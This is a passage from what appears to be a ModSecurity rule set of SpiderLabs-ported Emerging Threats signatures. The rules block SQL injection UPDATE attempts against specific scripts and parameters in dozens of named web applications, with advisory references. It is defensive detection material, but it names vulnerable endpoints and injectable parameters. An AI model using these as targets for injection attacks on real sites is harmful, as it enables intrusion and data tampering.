/gallery.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004324,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22988'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Absolute Image Gallery SQL Injection Attempt -- gallery.asp categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007397) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE SecRule REQUEST_LINE "@contains /product.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007397,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21166'" SecRule &TX:'/SQL_INJECTION.*ARGS:productid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- product.asp productid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007403) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007403,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21166'" SecRule &TX:'/SQL_INJECTION.*ARGS:search/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Alan Ward A-Cart Pro SQL Injection Attempt -- search.asp search UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010135) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt SecRule ARGS_NAMES "(?i:userid)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010135,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'cve,2009-2734'" SecRule REQUEST_LINE "@contains /dispatch.php?atknodetype=reports.weekreport" "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains UPDATE" "chain" SecRule QUERY_STRING|REQUEST_BODY "@contains SET" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Achievo userid= Variable UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007481) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE SecRule REQUEST_LINE "@contains /activenews_view.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007481,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:articleID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_view.asp articleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007486) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007486,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- default.asp page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007492) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE SecRule REQUEST_LINE "@contains /activeNews_categories.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007492,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:catID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_categories.asp catID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID UPDATE SecRule REQUEST_LINE "@contains /activeNews_comments.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:articleID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activeNews_comments.asp articleID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE SecRule REQUEST_LINE "@contains /activenews_search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007565,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21167'" SecRule &TX:'/SQL_INJECTION.*ARGS:query/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ActiveNews Manager SQL Injection Attempt -- activenews_search.asp query UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id UPDATE SecRule REQUEST_LINE "@contains /HaberDetay.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004892,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0620'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- HaberDetay.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE SecRule REQUEST_LINE "@contains /rss.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004898,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0620'" SecRule &TX:'/SQL_INJECTION.*ARGS:kid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aktueldownload Haber script SQL Injection Attempt -- rss.asp kid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005777) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005777,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3103'" SecRule &TX:'/SQL_INJECTION.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS @lex Guestbook SQL Injection Attempt -- index.php lang UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004022) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004022,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3956'" SecRule &TX:'/SQL_INJECTION.*ARGS:pack/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AlstraSoft E-Friends SQL Injection Attempt -- index.php pack UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004723) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /section/default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004723,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3390'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ANGEL Learning Management Suite (LMS) SQL Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE SecRule REQUEST_LINE "@contains /email.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006566,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- email.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE SecRule REQUEST_LINE "@contains /voirannonce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006572,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:no/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- voirannonce.php no UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006578) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE SecRule REQUEST_LINE "@contains /admin/admin_membre/fiche_membre.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006578,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:idmembre/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- fiche_membre.php idmembre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE SecRule REQUEST_LINE "@contains /admin/admin_annonce/okvalannonce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006584,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:idannonce/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- okvalannonce.php idannonce UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE SecRule REQUEST_LINE "@contains /admin/admin_annonce/changeannonce.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006590,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21514/exploit'" SecRule &TX:'/SQL_INJECTION.*ARGS:idannonce/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AnnonceScriptHP SQL Injection Attempt -- changeannonce.php idannonce UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006788) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE SecRule REQUEST_LINE "@contains /giris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006788,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21398'" SecRule &TX:'/SQL_INJECTION.*ARGS:kullanici/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp kullanici UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE SecRule REQUEST_LINE "@contains /giris.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006794,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21398'" SecRule &TX:'/SQL_INJECTION.*ARGS:parola/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Aspee and Dogantepe Ziyaretci Defteri SQL Injection Attempt -- giris.asp parola UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004729) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID UPDATE SecRule REQUEST_LINE "@contains /system/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004729,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22728'" SecRule &TX:'/SQL_INJECTION.*ARGS:PHPSESSID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Audins Audiens SQL Injection Attempt -- index.php PHPSESSID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007457) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE SecRule REQUEST_LINE "@contains /publications_list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007457,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451537/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:vjob/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publications_list.asp vjob UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE SecRule REQUEST_LINE "@contains /publication_view.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007463,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451537/100/100/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:InfoID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BPG-InfoTech Content Management System SQL Injection Attempt -- publication_view.asp InfoID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004336,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3466'" SecRule &TX:'/SQL_INJECTION.*ARGS:layout/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BP Blog SQL Injection Attempt -- default.asp layout UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007216) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE SecRule REQUEST_LINE "@contains /edit.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007216,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2848'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BasicForum SQL Injection Attempt -- edit.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006338) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE SecRule REQUEST_LINE "@contains /bt-trackback.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006338,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23316'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bluetrait SQL Injection Attempt -- bt-trackback.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE SecRule REQUEST_LINE "@contains /admin/config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004833,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/19758'" SecRule &TX:'/SQL_INJECTION.*ARGS:sqlcmd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Bookmark4U SQL Injection Attempt -- config.php sqlcmd UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004028) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE SecRule REQUEST_LINE "@contains /account_change.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004028,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3970'" SecRule &TX:'/SQL_INJECTION.*ARGS:style/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php style UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004034) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE SecRule REQUEST_LINE "@contains /account_change.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004034,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3970'" SecRule &TX:'/SQL_INJECTION.*ARGS:langue/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtiTracker SQL Injection Attempt -- account_change.php langue UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by UPDATE SecRule REQUEST_LINE "@contains /torrents.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004990,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/18549'" SecRule &TX:'/SQL_INJECTION.*ARGS:by/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS BtitTracker SQL Injection Attempt -- torrents.php by 